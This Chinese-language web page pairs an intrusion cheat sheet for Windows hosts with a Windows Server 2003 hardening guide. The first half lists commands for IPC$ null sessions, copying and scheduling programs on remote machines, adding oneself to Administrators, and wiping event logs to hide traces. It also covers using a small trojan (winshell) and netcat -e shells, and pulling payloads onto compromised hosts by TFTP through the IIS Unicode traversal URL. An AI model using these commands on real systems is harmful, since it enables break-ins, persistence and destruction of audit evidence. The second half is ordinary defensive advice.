常用的幾條NET命令

常用的幾條NET命令：
　　（與遠程主機建立空管連接） net use IP地址ipc$ "" /use:""
　　（以管理員身份登錄遠程主機） net use IP地址ipc$ "口令" /use:"Administrator"
　　（傳送文件到遠程主機WINNT目錄下）copy 本機目錄路徑程式 IP地址admin$
　　（查看遠程主機時間） net time IP地址
　　（定時啟動某個程式） at IP地址 02:18 readme.exe
　　（查看共用） net view IP地址
　　（查看netbios工作組列表） nbtstat -A IP地址
　　（將遠程主機C盤映射為自己的F盤） net use f: IP地址c$ ""/user:"Administrator"
　　（這兩條把自己增加到管理員組）： net user 用戶名 口令 /add
　　net localgroup Administrators 用戶名 /add
　　（斷開連接） net use IP地址ipc$ /delete
　　掃尾：
　　del C:winntsystem32logfiles*.*
　　del C:winntssytem32config*.evt
　　del C:winntsystem32dtclog*.*
　　del C:winntsystem32*.log
　　del C:winntsystem32*.txt
　　del C:winnt*.txt
  　del C:winnt*.log
　　一、netsvc.exe
　　下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務：
　　netsvc /list IP地址
　　netsvc schedule IP地址 /query
　　netsvc IP地址 schedule /start
　　二、OpenTelnet.exe
　　遠程啟動主機的Telnet服務，並綁定端口到7878，例如：
　　OpenTelnet IP地址 用戶名 口令 1 7878
　　然後就可以telnet到主機的7878端口，進入DOS方式下：
　　telnet IP地址 7878

 

三、winshell.exe

　　一個非常小的木馬（不到6K），telnet到主機的7878端口，輸入口令winshell，當看到CMD>後，可打下面的命令：

　　p Path （查看winshell主程式的路徑資訊）

　　b reBoot （重新啟動機器）

　　d shutDown （關閉機器）

　　s Shell （執行後你就會看到可愛的“C:>”）

　　x eXit （退出本次登錄會話，此命令並不終止winshell的運行）

　　CMD> http://.../srv.exe （通過http下載其他網站上的文件到運行winshell的機器上）

　　四、3389登陸器，GUI方式登錄遠程主機的

　　五、elsave.exe

　　事件日誌清除工具

　　elsave -s IP地址 -l "application" -C

　　elsave -s IP地址 -l "system" -C
　　elsave -s IP地址 -l "security" -C
　　執行後成功清除應用程式日誌，系統日誌，安全日誌
　　六、hbulot.exe
　　開啟win2kserver和winxp的3389服務
　　hbulot [/r]
　　使用/r表示安裝完成後自動重起目標使設置生效。
　　七、nc.exe(netcat.exe)
　　一個很好的工具，一些腳本程式都要用到它，也可做溢出後的連接用。
　　想要連接到某處: nc [-options] hostname port[s] [ports] ...
　　綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
　　參數:
　　-e prog 程式重定向，一旦連接，就執行 [危險!!]
　　-g gateway source-routing hop point[s], up to 8
　　-G num source-routing pointer: 4, 8, 12, ...
　　-h 幫助資訊
　　-i secs 延時的間隔
　　-l 監聽模式，用於入站連接
　　-n 指定數字的IP地址，不能用hostname
　　-o file 記錄16進制的傳輸
　　-p port 本地端口號
　　-r 任意指定本地及遠程端口
　　-s addr 本地源地址
　　-u UDP模式
　　-v 詳細輸出——用兩個-v可得到更詳細的內容
　　-w secs timeout的時間
　　-z 將輸入輸出關掉——用於掃描時 八、TFTPD32.EXE
　　把自己的電腦臨時變為一台FTP伺服器，讓肉雞來下載文件，tftp命令要在肉雞上執行，通常要利用Unicode漏洞或telnet到肉雞，例如：
　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 文件名 c:winntsystem32文件名
　　然後可以直接令文件運行：
　　http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名

九、prihack.exe是IIS的printer遠程緩衝區溢出工具。
　　idqover.exe是溢出idq的，選擇“溢出後在一個端口監聽”，然後用telnet連接它的監聽端口，如果溢出成功，一連它的端口，綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出，成功以後winxp下需要打winxp。
　　一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor，exe要放到cgi-bin目錄下，asp放到有ASP執行許可權的目錄。然後用IE瀏覽器連接。
　　一、一 Xscan命令行運行參數說明：
　　在檢測過程中，按"[空格]"鍵可以查看各線程狀態及掃描進度，按"q"鍵保存當前數據後提前退出程式，按""強行關閉程式。
　　1.命令格式: xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]
　　xscan -file <主機列表文件名> <檢測項目> [其他選項]
　　其中<檢測項目> 含義如下:
　　-port : 檢測常用服務的端口狀態(可通過datconfig.ini文件的"PORT-SCAN-OPTIONSPORT-LIST"項定制待檢測端口列表)；
　　-ftp : 檢測FTP弱口令(可通過datconfig.ini文件設置用戶名/口令字典文件)；
　　-ntpass : 檢測NT-Server弱口令(可通過datconfig.ini文件設置用戶名/口令字典文件)；
　　-cgi : 檢測CGI漏洞(可通過datconfig.ini文件的"CGI-ENCODEencode_type"項設置編碼方案)；
　　-iis : 檢測IIS漏洞(可通過datconfig.ini文件的"CGI-ENCODEencode_type"項設置編碼方案)；
　　[其他選項] 含義如下:
　　-v: 顯示詳細掃描進度
　　-p: 跳過Ping不通的主機
　　-o: 跳過沒有檢測到開放端口的主機
　　-t <併發線程數量[,併發主機數量]>: 指定最大併發線程數量和併發主機數量, 默認數量為100,10

 

windows 2003 伺服器安全攻略

一、Windows Server2003的安裝

　　1、安裝系統最少兩需要個分區，分區格式都採用NTFS格式

　　2、在斷開網路的情況安裝好2003系統

　　3、安裝IIS，僅安裝必要的 IIS 組件(禁用不需要的如FTP 和 SMTP 服務)。默認情況下，IIS服務沒有安裝，在添加/刪除Win組件中選擇“應用程式伺服器”，然後點擊“詳細資訊”，雙擊Internet資訊服務(iis)，勾選以下選項：

　　Internet 資訊服務管理器；公用文件；　　後臺智慧傳輸服務 (BITS) 伺服器擴展；　　萬維網服務。

　　如果你使用 FrontPage 擴展的 Web 站點再勾選：FrontPage 2002 Server Extensions

　　4、安裝MSSQL及其他所需要的軟體然後進行Update。

　　5、使用Microsoft 提供的 MBSA(Microsoft Baseline Security Analyzer) 工具分析電腦的安全配置，並標識缺少的修補程式和更新。下載地址：見頁末的鏈結

　　二、設置和管理賬戶

　　1、系統管理員賬戶最好少建，更改默認的管理員帳戶名(Administrator)和描述，口令最好採用數字加大小寫字母加數字的上檔鍵組合，長度最好不少於14位。

　　2、新建一個名為Administrator的陷阱帳號，為其設置最小的許可權，然後隨便輸入組合的最好不低於20位的口令

　　3、將Guest賬戶禁用並更改名稱和描述，然後輸入一個複雜的口令，當然現在也有一個DelGuest的工具，也許你也可以利用它來刪除Guest賬戶，但我沒有試過。

　　4、在運行中輸入gpedit.msc回車，打開組策略編輯器，選擇電腦配置-Windows設置-安全設置-賬戶策略-賬戶鎖定策略，將賬戶設為“三次登陸無效”，“鎖定時瀋櫛?0分鐘”，“復位鎖定計數設為30分鐘”。

　　5、在安全設置-本地策略-安全選項中將“不顯示上次的用戶名”設為啟用

　　6、在安全設置-本地策略-用戶權利分配中將“從網路訪問此電腦”中只保留Internet來賓賬戶、啟動IIS進程賬戶。如果你使用了Asp.net還要保留Aspnet賬戶。

　　7、創建一個User賬戶，運行系統，如果要運行特權命令使用Runas命令。

三、網路服務安全管理

　　1、禁止C$、D$、ADMIN$一類的缺省共用

　　打開註冊表，HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters，在右邊的窗口中新建Dword值，名稱設為AutoShareServer值設為0

　　2、 解除NetBios與TCP/IP協議的綁定

　　右擊網上鄰居-屬性-右擊本地連接-屬性-雙擊Internet協議-高級-Wins-禁用TCP/IP上的NETBIOS

　　3、關閉不需要的服務，以下為建議選項

　　Computer Browser:維護網路電腦更新，禁用

　　Distributed File System: 局域網管理共用文件，不需要禁用

　　Distributed linktracking client：用於局域網更新連接資訊，不需要禁用

　　Error reporting service：禁止發送錯誤報告

　　Microsoft Serch：提供快速的單詞搜索，不需要可禁用

　　NTLMSecuritysupportprovide：telnet服務和Microsoft Serch用的，不需要禁用

　　PrintSpooler：如果沒有印表機可禁用

　　Remote Registry：禁止遠程修改註冊表

　　Remote Desktop Help Session Manager：禁止遠程協助

　　四、打開相應的審核策略

　　在運行中輸入gpedit.msc回車，打開組策略編輯器，選擇電腦配置-Windows設置-安全設置-審核策略在創建審核項目時需要注意的是如果審核的項目太多，生成的事件也就越多，那麼要想發現嚴重的事件也越難當然如果審核的太少也會影響你發現嚴重的事件，你需要根據情況在這二者之間做出選擇。

　　推薦的要審核的項目是：

　　登錄事件     成功 失敗         　　賬戶登錄事件 成功 失敗

　　系統事件     成功 失敗                　　策略更改     成功 失敗

　　對象訪問     失敗                              　　目錄服務訪問 失敗

　　特權使用     失敗

五、其他安全相關設置

　　1、隱藏重要文件/目錄

　　可以修改註冊表實現完全隱藏：“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrent-VersionExplorerAdvancedFolderHi-ddenSHOWALL”，滑鼠右擊“CheckedValue”，選擇修改，把數值由1改為0

　　2、啟動系統自帶的Internet連接防火牆，在設置服務選項中勾選Web伺服器。

　　3、防止SYN洪水攻擊

　　HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters

　　新建DWORD值，名為SynAttackProtect，值為2

　　4. 禁止響應ICMP路由通告報文

　　HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersInterfacesinterface

　　新建DWORD值，名為PerformRouterDiscovery 值為0

　　5. 防止ICMP重定向報文的攻擊

　　HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters

　　將EnableICMPRedirects 值設為0

　　6. 不支援IGMP協議

　　HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters

　　新建DWORD值，名為IGMPLevel 值為0

　　7、禁用DCOM：

　　運行中輸入 Dcomcnfg.exe。 回車， 單擊“控制臺根節點”下的“組件服務”。打開“電腦”子文件夾。

　　對於本地電腦，請以右鍵單擊“我的電腦”，然後選擇“屬性”。選擇“默認屬性”選項卡。

　　清除“在這台電腦上啟用分佈式 COM”復選框。

　　注：3-6項內容我採用的是Server2000設置，沒有測試過對2003是否起作用。但有一點可以肯定我用了一段的時間沒有發現其他副面的影響。

　　六、配置 IIS 服務：

　　1、不使用默認的Web站點，如果使用也要將 將IIS目錄與系統磁片分開。

　　2、刪除IIS默認創建的Inetpub目錄（在安裝系統的盤上）。

　　3、刪除系統盤下的虛擬目錄，如：_vti_bin、IISSamples、Scripts、IIShelp、IISAdmin、IIShelp、MSADC。

　　4、刪除不必要的IIS擴展名映射。

　　右鍵單擊“默認Web站點→屬性→主目錄→配置”，打開應用程式窗口，去掉不必要的應用程式映射。主要為.shtml, .shtm, .stm

　　5、更改IIS日誌的路徑

　　右鍵單擊“默認Web站點→屬性-網站-在啟用日誌記錄下點擊屬性

　　6、如果使用的是2000可以使用iislockdown來保護IIS，在2003運行的IE6.0的版本不需要。

　　7、使用UrlScan

　　UrlScan是一個ISAPI篩選器，它對傳入的HTTP數據包進行分析並可以拒絕任何可疑的通信量。目前最新的版本是2.5，如果是2000Server需要先安裝1.0或2.0的版本。下載地址見頁未的鏈結

　　如果沒有特殊的要求採用UrlScan默認配置就可以了。

　　但如果你在伺服器運行ASP.NET程式，並要進行調試你需打開要%WINDIR%System32InetsrvURLscan

　　文件夾中的URLScan.ini 文件，然後在UserAllowVerbs節添加debug謂詞，注意此節是區分大小寫的。

　　如果你的網頁是.asp網頁你需要在DenyExtensions刪除.asp相關的內容。

　　如果你的網頁使用了非ASCII代碼，你需要在Option節中將AllowHighBitCharacters的值設為1

　　在對URLScan.ini 文件做了更改後，你需要重啟IIS服務才能生效，快速方法運行中輸入iisreset

　　如果你在配置後出現什麼問題，你可以通過添加/刪除程式刪除UrlScan。

　　8、利用WIS (Web Injection Scanner)工具對整個網站進行SQL Injection 脆弱性掃描.